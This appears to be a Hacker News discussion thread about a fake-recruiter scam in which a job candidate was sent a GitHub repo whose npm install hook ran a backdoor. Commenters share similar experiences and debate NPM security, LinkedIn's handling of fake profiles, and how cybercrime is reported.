I only use LinkedIn for the job postings but they’ve become flooded with nonsense the past few months. Lots of postings from Ladders, Swooped, and various companies like those. I think I’m about to ditch LinkedIn permanently.
Smells like contagious interview campaign by DPRK folks. They have been doing this for a while. Even using IDE settings, Claude hooks for malicious code execution.
I didn't read everything, but I had a DM offering a gig a few weeks ago, and asked me to check out a React site/app. I cloned it and it looked dubious; replied I pass.
Oh my goodness! I had this play out as is on Friday. I luckily got on the Zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.
> Instead of cloning and installing dependencies, I spun up a throwaway VPS on Hetzner, cloned the repo there, and pointed Pi at it in read-only mode, with only file-reading tools enabled...
Good man, knows what he is doing.
FWIW, I only run AI CLI tools on a Hostinger VPS, never on my personal device. It also allows me to run YOLO mode across the board. If I am working on a web project, then I use preview develop deploys for testing, so I do not even have to work on my machine. It's a very fun workflow for experimentation. Still trying to work out the kinks to make it easier.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Were I still on Linkedin, I could totally have been caught by this. Thank you for this post, and the technical breakdown.
The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
I feel like there are only going to be more attempts like this, given how many recently made-redundant software engineers are out there, and the level of desperation to find a job.
With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.
Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).
They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents were as follows (with the malicious URL removed):
I'm working 3 remote jobs right now and I can tell you guys to really watch out.
Often they are not malicious, just an unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take-home screening project, and they are quite good at getting into engineers' heads that "leetcode is outdated/they don't believe in it" and whatever they want you to hear.
They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.
I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:
They know there's a high degree of fraud and they don't do anything about it. They don't care.
I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”
> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.
> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.
> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.
Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
surprise is unwarranted as linkedin enshittifies. This type of thing is exactly what happens when neither the user of the service, nor the third party commercial interests are being served by the commercial enterprise. It's a vacuum that scams enter into.
LinkedIn is unusually resistant to enshittification; it started that way.
Friends don't let friends use NPM. At this point it is so wildly crazy watching people get owned, I don't understand how anyone uses it when they could use e.g. pnpm and block one of the most obvious and frequently exploited holes. These tools with arbitrary code execution when trying to download some code have got to stop.
Edit: typos
> Friends don't let friends use NPM
or linkedin
I don't have friends, therefore I must use LinkedIn to get a job. Hooray!
I know you are joking, but there is something about this that I really don't get. "Friends" here really means "a professional network". Many nerds despise having one or maintaining/building one. At the same time, people pour weeks/months/years of their life into optimizing their modest investment portfolios. 0.01 percentage points of yearly cost differences of some passive ETF. That surely compounds. But you know what also compounds? Knowing somebody who knows somebody who has $skill or $job_posting. In a big way. Your work comp is still the biggest source of income for most, but investing into optimizing it by broadening your network is something people don't want to do. They'd rather discuss the tax implications of nuances of some investment portfolio.
I don't disagree, but broadening your network is a very different skill (being social) than handling investment portfolios. And for some of us, it's not that we necessarily despise creating or maintaining a network, it's that we suck at it.
Github / Microsoft could easily fix this, couldn't they? Leaving NPM up in its current state seems criminal, especially since LLMs generate NPM commands so frequently.
They have some changes here in v12: https://github.blog/changelog/2026-06-09-upcoming-breaking-c...
And the discussion here, with 215 comments: https://news.ycombinator.com/item?id=48467705
Is it possible to fix it in a backwards compatible way? Removing lifecycle scripts is at least a semver major change, and would complicate existing projects relying on packages with lifecycle scripts from upgrading.
This is a real world trolley problem scenario. You can break workflows or you can let everyone get pwned by supply chain attacks. Which is the greater harm?
People will not adopt a safer version if it broke their workflows. Adoption is part of preventing supply chain attacks.
They will if it's the only version. Eventually.
I agree, but I’d extend that to any language using a package manager at this point. “A little copying is better than a little dependency” even more correct now.
All my current projects have all the code needed in the repo (unless impossible, and aside from a compiler which I guess could also be compromised)
IYKYK
>These tools with arbitrary code execution when trying to download some code have got to stop
But you still end up with the code on your machine and risk it being run.
Bigger issue is giant, inscrutable dependency trees.
In this example, if they tried to run the test suite or application, they'd have been in the same boat.
Afaik all or most languages have some way to run arbitrary code at install time but it seems node is the main one getting targeted. I think the bigger issue here is just people running untrusted things.
Claude Code regularly installs dependencies using (p)npm after I e.g. pull a company main branch to get in sync with my teammates. That happens often. So I pull, Claude edits some code as you requested and it should pass because Claude did alright, but your local box has out-of-date deps. So then Claude runs (p)npm i and now we have automatic exploitation of this gaping hole in npm given extremely common and current AI tooling. Someone has to figure out how to stop AI from running that command or NPM needs to stop that behavior, and I guarantee you it will be easier to get one tool to change than all AI.
The lockfile should protect you there. It'd only be an issue if you're working on updating dependencies in which case there's other protection like min-release-age
If pulling down your company repo and running `npm install` can lead to a compromise, something has gone terribly wrong with your company's security setup.
I haven't been phished like this but I've certainly had fraudsters try to con me into meetings or schemes, etc.
LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
We've had fake recruiters that claim to work for us running basically the same scam. These are great fake profiles: LinkedIn Premium, tons of relevant posts, etc... but they don't work for us, and we get angry messages from people saying our recruiter tried to scam them. No, they're not our recruiter despite showing up on our company page on LinkedIn. No number of reports could get them taken down.
I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn, but not all startups have that connection!
LinkedIn didn't even disavow people pretending to work for LinkedIn until someone had too much fun with it - https://chrisduffycomedy.com/blog/2016/11/2/6-months-as-the-...
That’s funny, thanks for that.
What happened in the end?
Microsoft bought LinkedIn.
He got a huge package.
Everyone lived happily ever after.
(LinkedIn eventually locked and then deleted his account, https://awesomeatyourjob.com/1140-bringing-more-laughter-fun...)
My last 2 companies, LinkedIn asked me to add an email address associated with the said company and actually confirm via said email in order to add them to my profile. So, if I worked for FooCompany, I had to have a @FooCompany.com email which is setup by someone at the company itself. Does this not cover what you're talking about?
According to my research, LinkedIn only does this for executive and now recruiter-like titles, but not broadly. You may be able to in order to get "verified on LinkedIn" but it's not a requirement for showing association with a company.
https://www.theverge.com/news/771210/linkedin-recruiter-exec...
I'm bottom of the ladder but have seeing the option to do it for at least a year.
If it’s an option and not required, then that doesn’t solve it.
Any clue what their "Persona" program is, that they are trying to push hard "so you can have so much positive leads"?
I have the same. The difference is, if you do email verification, you will get "verified" status. If not, you can still add the company to your LinkedIn, just unverified, which is not a label.
You mean @fooco.com? Or @foocousa.com? Or @fooco.xyz? @fooco.ai? @foocoltd.net? @foo.co.uk?
How would LinkedIn validate that your email domain belongs to the company you claim to work for?
Presumably because the official company page is registered under it?
Not all companies use email addresses under the same domain as the "official company page" though.
With a company-managed list of owned domains where real employees have their work email addresses (unrelated to website domains).
And using DNS to prove that a domain is actually owned by this organization
Email domains of employee addresses aren't necessarily owned by the company. For example:
For security purposes, on the other hand, the important part is proving that the LinkedIn account is owned by the organization.
Then there are old school ISPs where there was no separation between company and customer email addresses.
What HelloNurse said, whoever it is that runs the company page on LinkedIn provides a list of domains that they consider theirs.
I had a LinkedIn account connected to my company email and one day I found myself locked out.
They want me to upload a govt id and blink my eyes in a video to get unlocked.
They can go jump.
>I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn
I'd like people to understand that this is a form of corruption. We've normalized many like it. LI knows that the only way to force them to fix the issue is to go through a drawn-out legal process, save a spate of bad press (RIP 60 Minutes), so of course they won't.
And I'd like people to understand that, legally, corruption necessarily involves the government. Informally, corruption has been applied to any type of bureaucracy but, even then, an exchange of favors itself isn't corruption, only if an unauthorized deviation from the involved agent's role happens.
Not that relying on this is a good idea.
Bwahaha, no it doesn’t.
Legally ‘corruption’ doesn’t exist, as in there is no single law saying ‘corruption is illegal’. (What is ‘corruption’ exactly?)
There are laws against bribery, which do generally only apply to the government, but in many locations apply to pseudo-government roles like notaries, apostilles, lawyers, etc.
There are laws against embezzlement (a type of corruption), and those definitely apply to private individuals.
There are laws against insider trading, a type of corruption. Those generally only apply to businesses/private folks, not the government, with some exceptions.
Then there is the various kinds of fraud, blackmail, etc. Most people would consider them corruption too. Those apply to private individuals and government agents too.
And many more. It’s a smorgasbord.
Brazilian law, for instance, defines the crimes of passive and active corruption:
But, granted, reviewing US and UK law, it seems they don't define "corruption" as a crime (albeit some of the act names do mention corruption). So let's fall back onto the dictionary: [2]
Both definitions a and c are too ample and, as you put it, "a smorgasbord". Definition b, especially when combined with a, describes something pretty specific: inducement of a powerful agent to wrong by improper or unlawful means, such as bribes.
Embezzlement is better typified under theft. Same goes for most of the others: fraud is fraud, blackmail is blackmail. They may acquire a "corrupt" character when they are done in direct exchange of personal material gains. There are discussions about whether insider trading should be illegal.
Generally speaking, corruption is primarily a crime against public administration because it involves the government, which (supposedly) represents the people. Private companies represent themselves, so they get to (more) trivially decide who is on the line or not.
[0] https://en.wikipedia.org/wiki/Passive_corruption
[1] https://en.wikipedia.org/wiki/Active_corruption
[2] https://www.merriam-webster.com/dictionary/corruption
That is literally just a translation difference for bribery, a common issue for Brazilian Portuguese vs English.
[https://www.jusbrasil.com.br/topicos/10598684/artigo-317-do-...].
[https://www.britannica.com/topic/bribery]
> corruption necessarily involves the government
False. [0] If the bank teller demands a bribe to let you withdraw from your account, that's corruption, even though they aren't working for the government.
> Corruption is the dishonest, fraudulent, or criminal use of entrusted authority or power for personal gain or other unlawful or unethical benefits. Corruption occurs in politics, business, education, media, and other social and economic fields.
[0] https://www.law.cornell.edu/wex/corruption
That sure is an interesting take from someone with "anarchist" in their username. IMHO corruption is any time you use power/influence/station in order to skew the normal well-behaved channels of governance (cybernetics) for personal gain. Any system with hierarchy can have corruption. Bernie Madoff was an example of illegal, private industry corruption.
I agree with you. I used to work for an ISP that sold kind-of overpriced 1Gbps connections and always wondered why customers bought it. Probably helping things was that we took them out to "events", floor seats at basketball, etc. The company just has a fixed expense, but the people making the decision get free stuff that makes them feel important, and it was kind of a way of transferring the company's money (by not buying the $29/month Internet connection) to themselves. I never felt good about it, but if you say that out loud, everyone will look at you like you're crazy.
AWS did this for us at the time but the 3 people in the company that used AWS services never got to go to these things. So I doubly don't get it.
Vendor bribe swag is basically ubiquitous in the industrial world. When I worked in oil and gas it was quite common for a vendor to do a 'lunch and learn' where they bought the whole office very good lunch and we listened to them pitch whatever product line they wanted us to specify for design customers. I work in a more socially responsible but less lucrative industry now and alas no vendors buying me lunch
LinkedIn doesn't have any redressal mechanisms for anything. Someone I knew went through a lot of abuse by a LI user and kept making new accounts to harass. LinkedIn's response - "We did not find anything that violates our ToC". No wonder it has become a cesspool of spam, fraud and abusers.
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
I remember getting an office manager, working from Dubai (I think), for my one-person, basically nonexistent company, working from my living room, in New York.
She may still be there. I never bother checking into LI, except making an occasional post, every few months.
I was looking for people who I had worked with at a company that was acquired 15 years ago, and some random person claims to be the CEO of that company.
How does that not become a legal issue?
Who are we gonna sue? LinkedIn? I think my place of employment has better things to do than sue Microsoft.
> got it solved by buying drinks for a buddy of mine that works for LinkedIn
That it requires you to buy your buddy a drink says it all. They should have taken the general issue to their higher ups, fixed it for you and then bought you a drink. Or dinner, on LinkedIn's dime.
I know it is only a partial solution, but I saw with some companies that LinkedIn provides a way to verify a user works at such a company. This is done via sending an email to a company domain email address (supposedly yours that you provide), and then approving it from your work laptop. I guess the administrators of the company account on LinkedIn can determine which domains are allowed for this.
The only way this could be abused is if the administrator accounts on LinkedIn itself get hacked and temporarily other email domains are added to the whitelist (or if an approved user themselves got hacked on LinkedIn [or their work email for that matter]). These are all the usual vulnerabilities in any system.
I understand that it would be too extreme to only allow users to claim they worked at a company if this verification is done, but maybe putting a warning if you get a message from a recruiter/someone that has not verified they work at their 'present' company could go a long way (instead of right now tucking away the verified logo quietly on their profile page).
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
I had the opposite problem: my company name was equivalent to the owner of an online casino. It took me a year to figure out that the enormous amount of spam I was getting about ‘guest post placement’, and people contacting me about deals was because Linkedin put me among the list of the casino employees. As I was Director of my company, I was the most valuable prey for business spam.
I fixed the problem by deleting my account, but now I’m in all the shittiest of spam lists for eternity. I don’t know how do they even harvest emails from Linkedin.
> I don’t know how do they even harvest emails from Linkedin.
https://haveibeenpwned.com/Breach/LinkedIn
this is from 2016. at the time they had ~400 million users, and the breach is 164 million. Now it's close to 1.5 B. People these days use aggregators like Apollo, signal hire, apify. There are 1000s of such tools.
I had it several years ago when I was running my own one-man consultancy [ie: self-employed] ... somehow I'd managed to have six or seven people on LI claiming to work for the same company.
Reported them to LI and nothing was ever done about it. Eventually the accounts disappeared as I guess they were either shut down or repurposed.
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
It isn't at all a neat solution, but you could maintain a list of users on LinkedIn that are authorised to speak for your company, linked prominently on your profile with a warning that anyone else claiming to work for the company is likely a scammer but LinkedIn offers no way for you to stop them claiming to be part of your company.
If that became a common pattern it could highlight how much of a scammer paradise LI can be and maybe they'd be more likely to do something about that particular vector.
I wonder if a cease and desist to their legal department would work better?
> I wonder if a cease and desist to their legal department would work better?
I assume you mean the LinkedIn legal dept. The problem there is that these companies are so big that a 'complaint' or 'cease & desist' to them would be like a mosquito bite, if that, & most likely get lost in the 10s of thousands of other complaints.
It's the same with FB & Insta, etc. One of my daughters had a FB acct taken over that she had accumulated quite a following (~100k plus) with her custom hand drawn artwork. It was impossible to get any acknowledgement of the issue let alone get a suitable solution. And, unfortunately these large companies do not care. Sometimes makes you wonder if LinkedIn & the like are even worth it
Things like this were a tried and tested method on Upwork, particularly in the 2021-2022 crypto/nft highs. At some point they branched out from crypto projects and cast a wide net across different categories.
Last I recall was a download of a windows scr (screensaver masquerading) file.
Linkedin is a new low, and I'm sure the platform doesn't really care (look, more jobs), just as ad network companies (Google, Meta) don't really care about scam ads.
I reported a fake costco website ad (cc harvester) to Google, their response was something along "we cannot verify the ad", go figure
I've had people phish for my email then hit that with some bullshitpowershellladendoucument.pdf.docx crap, but sending it directly in the IM?
Bold strategy cotton, let's see if it pays off.
I'm not. I call it identitythiefresourcecenter.com or its shorter name freecriminalresource.com
I hate how normalized it became for "HR" to require you having a LI page for a job. I don't think its as bad now but for a while it was essentially not possible to get a job without putting all your personal info on linkedin.
I recently went through an interview—o-thon and got a couple obvious scammers. I hope it’s because it’s more prevalent, and not because I seem stupid enough to fall for it!
It’s been this bad for a little while, iirc have seen a few of these pop up over the last few years. And that’s just for the few someone’s caught/documented
I stay away from anything that needs npm. I regularly scan for node_modules folders and rm -rf them.
> a recruiter at a small crypto startup
That's all you need to know they're criminals and frauds.
I've been freelancing for over a decade. This stuff is every third crypto related job. They're all malware repos running scripts the moment you turn on vscode hoovering up everything they can on your computer.
It's the least surprising thing once you've put yourself out there, very strange watching people here think it's novel, I expect it by default at this point, a stranger handing you code needs to go into a vm, would you let them hand you some candy with a wink too?
while working at a Fortune 500 MNC, gig before this one, I used to get LinkedIn hits from recruiters.
never got serious ones before, the occasional, useless headhunters who are clearly not based in the same country, but these were different. They were big companies in Canada, ones I'd definitely heard of and even applied to in the past. They were direct, were recruiters for those companies themselves, and were plugged in, able to answer questions, and engaging.
they constantly sent job ads, but only via .pdf files. I even pushed back on one and said I don't open random pdfs, send me a link and they declined. Same recruiter hit me up for a similar role a month later, also via pdf.
Multiple other members of the IT org, esp. the security and infra teams, also reported similar, aggressive recruitment efforts with pdfs. This was around 2020-2021.
Job candidates keep facing a lot of hurdles, including scams, Trojan horses like the one presented here, ghosting, wasting candidates' time, nepotism, etc. As a candidate you can easily spend more than 8 hours a day looking for opportunities, switching stacks, studying, doing take-home projects, etc, for absolutely nothing. Life is precious and shouldn't be burned like that!
> Life is precious and shouldn't be burned like that
Very true. I remember when I was job hunting for 2 years post-graduation, that these time sinks started to take meaning away from life and induced cynicism and depression (to an extent).
It's easy to forget all that once you end up getting a job, but remember to always be human and show empathy if a person cold-reaches out to you.
It is absolutely the worst. Also the feeling that this task of job searching is supremely important. You feel guilty doing anything that isn’t job searching. Meeting friends? Spending money while you aren’t making any? Seems irresponsible internally. When your day fills with stuff that isn’t job searching it makes you feel that day was a failure. Even when you do job search and you have say a month without any bites, it also makes you feel that month was a failure. You feel like you are wasting your life. At least when you had a job, that time spent counted for a little more experience. Every second without a job feels like it counts against you. You feel like a leper. Look at me who failed to secure a job, I must be a failure, you think internally.
So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
yes this is a crime.
Unfortunately most evil cybercriminals know the "one weird trick" of "do your crimes in countries that don't care about the crimes"
I see several comments like this implying nothing can be done. But that is far from the truth. First, an agency that actually answered the phone could coordinate directly with LinkedIn and other tech companies to quickly take down these fake accounts and minimize harm to others. We all know how incredibly hard it is to contact a tech company. Second, an agency that answers the phone could help less technical people find what may have been compromised and push people towards support services if needed. And finally, maybe, they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time.
Won't that require laws that allow the said agency to compel LinkedIn or whatever tech company to actually pay attention and take action? Like laws compelling tech companies to unlock the bootloader once they stop supporting a device.
I wonder why such common sense laws don't exist and who is preventing them from being introduced and passed despite wide public support in general?
I'm not a lawyer but it would be odd if a government agency couldn't communicate a possible threat to a tech company. It is in a company like LinkedIn's best interest to set up a phone number/channels for a centralized agency to communicate potentially malicious accounts and other emerging threats. I suspect that actually already exists for big companies. I doubt they are required to -do- anything without laws but this seems like a win that is easy for all sides. The problem is likely mostly on the US (and other govt) side of things. No clearly defined agency with a clear mandate, resources and leadership to take on this task.
You're describing the FBI or your state level equivalent. And they actually do exactly what you are describing, but in measured efforts. I've even had them come by my place of employment before. They clearly lack the resources to work at this scale though.
The problem with a phone number you suggest is that it will get spammed and abused with fraudulent imposters too (the complete and utter destruction of trust in phone calls and text messages should also be corrected by the government, but that's a different topic).
https://www.fbi.gov/investigate/cyber
whilst reducing crime is an honorable objective, as we all know, increasing the wealth of tech billionaires must take priority.
Taking things down doesn't help much unless the platform has something in place to make it hard to recreate them.
>they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time
At least in the U.S., everyone will cry government overreach and no one will fund it. In other countries, they should probably just ban U.S. platforms unless they're reachable and actually resolve these type of problems.
> just ban U.S. platforms
Try that and see your champagne exports be tariffed at 100% in no time.
china seems to be doing fine. what are you gonna do, tariff the country that makes all your stuff? 100% tariff on iphones and macbooks?
Won't that just create another channel for social engineering to delete a victim's account?
Sounds like socializing the harms instead of requiring these companies to bear the burden themselves. Could still be a valid approach but I'm afraid it will make them take less responsibility, not more.
> But that is far from the truth
Just install a Russian locale on your computer to prevent malicious programs even starting and get on with your day because it's the truth.
Snowden is a free man in 2026 despite the United States of America very much wanting to put him in jail.
Cut the cables
Something I've always wondered, because I'm a bit of a contrarian and I wonder if we're really any different: Could an American citizen hack and steal from Iranians and Russians with impunity from America? The issues that prevent the US from extraditing Russians who hack us -- don't they work both ways?
Legally speaking, no - it would still be a criminal offence.
Practically speaking, there is zero chance that the USA would extradite someone to Iran, even if they weren't currently at war with them. Whether they did anything about it would probably depend on exactly what the situation was - there's a big difference between targeting IRGC or defence systems and ransomwaring an Iranian hospital or scamming random citizens.
Where they'd probably get you is if you tried to monetise it, and get stolen/extorted cryptocurrencies (or whatever) into your bank account. But that could easily fall under tax evasion laws rather than computer misuse ones, because they'd be a lot easier to prove in court.
What would happen if you honestly listed your earnings on your tax forms?
It would be very dependent on the exact circumstances - who made a complaint, what exactly they're accusing you of, what evidence there is, how high profile it is, the current diplomatic position (which changes by the hour), etc, etc. I don't think you can really get a simple answer for this kind of question.
As far as I know it has never happened. On the contrary, when Alejandro Caceres admitted to ddosing North Korea - taking down all their public websites for a week - he was questioned by the FBI who decided to take no further action.
https://www.wired.com/story/p4x-north-korea-internet-hacker-...
So hostile countries should be fair game for Americans who want a side-hustle. Plenty of Russian targets that could be profitable.
the main issue is that we lack a global '911'.
secondary is the effort asymmetry between spinning up one of these scams (near 0 effort) and catching/prosecuting these scams (big effort, astronomical cost)
I don’t know but the US kidnaps ehhh arrests people on foreign land on a regular basis… and brings them to the US to stand trial. So if it’s “important” enough it will be acted upon…
> the main issue is that we lack a global '911'.
911 is for emergencies. I don’t think the global 911 service would give any attention to a LinkedIn scam.
i used the same terminology as the parent, and i think we all know what is meant by it
what about the outcome asymmetry between spinning up one of these scams (get one guy's computer) and getting caught (jail for life)
you aren't getting jail for life for this, even in the extremely remote chance you are caught. you are probably getting more than one guy's computer, though.
I’m sure they’ve gotten more than one hot wallet from out of work crypto bros. Probably a profitable venture.
> main issue is that we lack a global '911'
406 MHz is pretty close [1]. If you have a radio that screams on that channel, chances are the nearest search-and-rescue operation will at least be notified.
[1] https://www.sarsat.noaa.gov/emergency-406-beacons/
https://www.ic3.gov
You won't hear back from them, though. But, at least for US citizens (and possibly for anyone?), this is as far as I know the closest thing there is to an "Internet 911".
> You won't hear back from them
You might. (I have.) They were able to get a wire sent to a fraudster reversed. (Not my wire.)
To put it bluntly and perhaps a bit cynically, on the tree of bad things that people do to other people, this is pretty high-hanging fruit. Right up there next to scam phone calls that prey on the elderly while claiming to be from Microsoft support.
It's basically impossible to catch suspects because they are either smart enough to cover their tracks very well, or (more often) live in countries whose governments don't care about their citizens (even pay them for) scamming westerners.
Saw Microsoft has a dedicated scam reporting page - guess it was damaging their brand https://reportfraud.microsoft.com/en-us
Wonder if they’re effective in going after reports. I’d still report to IC3/FBI/powers that be, too. Just in case someone somewhere has the resources to do something… perhaps a high hope
I get more calls from Google Security than any other thing. Oddly the Pixel's built in scam detection and call screening lets them through without fail. I normally don't have my phone even ring unless it's in my contacts, but saying you are calling from Google is like a magic code.
They must have whitelisted the word Google. Very useful to scammers.
Hard disagree on the scam phone calls. It would be trivial to eradicate them almost completely if the phone operators did the bare minimum to fight against it. At any point in time, any given US phone number is handled by exactly one phone carrier. There is nothing stopping that carrier from requiring name and address to issue that phone number. They already do for 99.99% of their legitimate customers. It would be very easy to make it so that every single phone call originating from the US, including all VOIP calls made with US phone numbers, can be traced back to a specific business or person that can later be sued or prosecuted.
And no, number spoofing isn't an excuse either. We literally solved the much harder problem of email spoofing already. There are, what, 3 carrier networks in all of US? And they cannot do with each other what DMARC did for the hundreds of thousands disjoint organizations that comprise the internet? Please.
Yeah 100%. It's criminal that this is not already done.
>It would be trivial to eradicate them almost completely
Absolutely true, but droning their data centers might have some policy repercussions.
A majority of people would enthusiastically support drone strikes on scam callers and their infrastructure.
Wasn’t that sort of the premise of The Beekeeper?
KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure. This is on par with being unable to open a bank account if the capability is matured. I'd advise that you think long and hard about the consequences of this system being applied against you maliciously before signing on the dotted line.
> KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure.
We have that in Europe and the world has not fallen apart. On top of that, we don't have even close to the scale of problems with scammers that the US has. I won't deny that we have scammers, because we absolutely have them, but they are far from the scourge they are in the US.
> This is on par with being unable to open a bank account if the capability is matured.
The secret is... we have constitutionally protected rights. Unless you do not pay your bills, your phone line will not get disconnected. And same for bank accounts - every European has the right to a basic banking account, even if you are a target of foreign sanctions [1].
[1] https://www.tagesschau.de/ausland/europa/konto-eugh-usa-sank...
I'm in the US, I have two 20-year old phone numbers and 1 cell number, none ring through with spam or scams.
I wonder why that is? I don't give the numbers out. That's why. Whenever a store says "do you have a number with us" I say I don't have a cell phone. If they can plainly see I do have a cellphone, I add, "for that."
The second part is shopping at stores that don't tie prices to your having given them a number.
There already are laws that would prevent the exact thing you're talking about. A requirement to provide name and address would change absolutely nothing. And if legal protections are not enough for you then what are we even talking about? Your phone carrier could disable all your lines this instant with a few clicks if they wanted to; the technical capability is already there. They also have your name and address from listening to phone calls and triangulating cell towers - though realistically they didn't need to do it because you already gave them your details knowingly and willingly as part of starting the service, didn't you?
I'd advise that you think long and hard about the consequences of the current system before saying the alternative is worse.
Number spoofing is not a solved problem because some carriers, which appear legitimate in all other respects, make a business out of routing your traffic over TDM trunks that don't support caller ID verification, and will claim it's extremely expensive to upgrade these to VOIP.
Fuck 'em? That's not an insurmountable problem in the slightest. Google or Apple could probably solve this problem themselves by simply not ringing the phone for any call that doesn't meet ID verification.
The behavior of the phone network is set by government regulation. If you refuse to service allowable calls, you are heavily fined or kicked off the network. The government has to update the rules.
I'd be 100% happy to block those carriers from calling me. Their users should just get a message that calling my number is not supported and they should try calling me from another device.
Not allowed. The same government rules that stop Google from refusing calls from Apple devices also stop them from refusing calls from whoever is doing this. The government would have to update the rules. They could mandate number verification for all calls, even those passing over TDM trunks, and make it the network's problem to figure out how to do that. The rules currently say that all calls which don't pass through legacy equipment must have verified numbers, so there's a market for making calls take stupid legacy routes on purpose.
You are not wrong. They don't do this because they make money from the scammers.
I have posted about this before. See here: https://news.ycombinator.com/item?id=35191971
I always wondered why US cannot pressure India to crack down on those scammers? They use phone network, it should not be difficult to find them. Some youtubers even hack into their computers and extract all the info. US probably has a leverage here, they could simply ban Indian companies from working with US if they don't cooperate.
US was so angry about "unfair" tariffs why are they not angry about criminals stealing from Americans?
Have you seen the state of *gestures at everything*
You mean organized crime like NSO Group? Sorry, governments all over the world are too busy using them to spy on opposition to care.
The scammers are in a whole different uncooperative country.
Or they may be in this country, but use proxies, virtual machines, hosting from an uncooperative country.
Less likely and when they are usually they're immigrants and if they're investigated they just go back home.
Cool let's hear your solution, you seem well versed on how infosec works.
Yes. But the perps are in North Korea.
There is, but the FBI is horrible at responding to cybercrime. They have IC3 but it's basically useless. They aren't going to help or even contact you if you report a crime to them.
The amount of crime in the world -that requires arguably "low skill" time to resolve- that just gets filed away because of low resources is insane. How are forces going to stand up high skill task forces for these kinds of things?
In the Netherlands there's an official government agency that allows a simple mail or report: https://www.ncsc.nl/en/report-an-incident-to-ncsc-nl
I presume more countries have this, not sure about the US though (CISA maybe? CERT/CC?). CERT is the overarching org that manages local agencies like this Dutch NCSC. Though I am not sure if and how easy it is, globally, to report incidents.
Try calling 911 for a real world crime and see what it gets you.
The difference between pre- and post-chatbot writeups is stark: https://igor-blue.github.io/2021/03/24/apt1.html
$100 says OP is Claude
nice! i fell for it..
I don't want to be cynical, but maybe spending hours every day using Claude has made some of us particularly attuned to picking this up. For some reason as soon as I read "The trap was in app/test/index.js," I instantly knew it was Claude. It's too bad, because there will obviously be some false positives, but it makes me immediately disregard the author.
I sometimes use the Claude app with text to speech enabled. It’s got a quite distinctive voice/tempo combo when it’s outputting speech.
Whenever I see a typical Claude-tell in writing, my internal reading voice switches automatically from my internal monologue’s voice into Claude’s voice for the rest of the piece.
I think that comment is a little unfair, as the one you link to is a much more sophisticated attack. Thanks for the link, though. Great read!
This type of attack has been happening a lot the past 2 years. I've seen one that was very well done...the GitHub account of a fairly well known security researcher had been compromised...their identity and code was being used as part of the recruitment. I reached out to the person...who was understandably embarrassed and told me they had reported this to LinkedIn + Github but saw no action.
This is the part that really irks me: LinkedIn and Github know this is the end goal of many of the rampant supply chain attacks but they a) don't have a first class mechanism for reporting b) don't seem to be improving their systems or even warning people. I have been hit by this enough times that I follow along to get screenshots of the scammer. One might think with all the surveillance systems Microsoft/LinkedIn/Github/Google-Meet/Calendly have in place that a potential victim reporting it along with an actual picture of the scammer could get us somewhere.
Call it a conspiracy theory, but I think a lot of these businesses actively avoid making serious efforts because even trying creates expectations. Ones that they don’t want to be on the hook for.
Like the Facebook problem. They were never in more trouble with people and legislators than when they were spending mountains of gold trying to police content.
It’s much easier to shrug and say, “Sorry folks, it’s the internet. Good luck.”
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Oh, Microsoft.
They should have reported it for DMCA violation. It would be gone instantly.
I once saw an ad on LinkedIn made up to look like the CBC (Canadian news) linking to a fake video of the Canadian prime minister announcing a crypto investment plan for all Canadians, with a link to sign up. I reported the ad to LinkedIn and shortly after got a reply telling me they investigated and didn’t find any violation of their policies.
I’ve seen this fake Carney garbage on YouTube. Money speaks louder than truth.
> they investigated and didn’t find any violation of their policies.
When my YT Premium elapsed, 70% of ads YT decided to show me were deepfake investment scams (of terrible quality), and Google also didn't find them to violate any of their policy. The remaining 30% were straight up foreign state-level propaganda, those I didn't even bother to report.
Weird, isn't it? Microsoft owns all of LinkedIn, Github and NPM.
All three either have security or stability issues, which seems to get worse, not better, as microsoft goes more into AI. Where is the AI productivity (10x by some accounts!) within the company going to?
Keep in mind this is the company that makes Windows, a product so insecure they lost a lawsuit over it
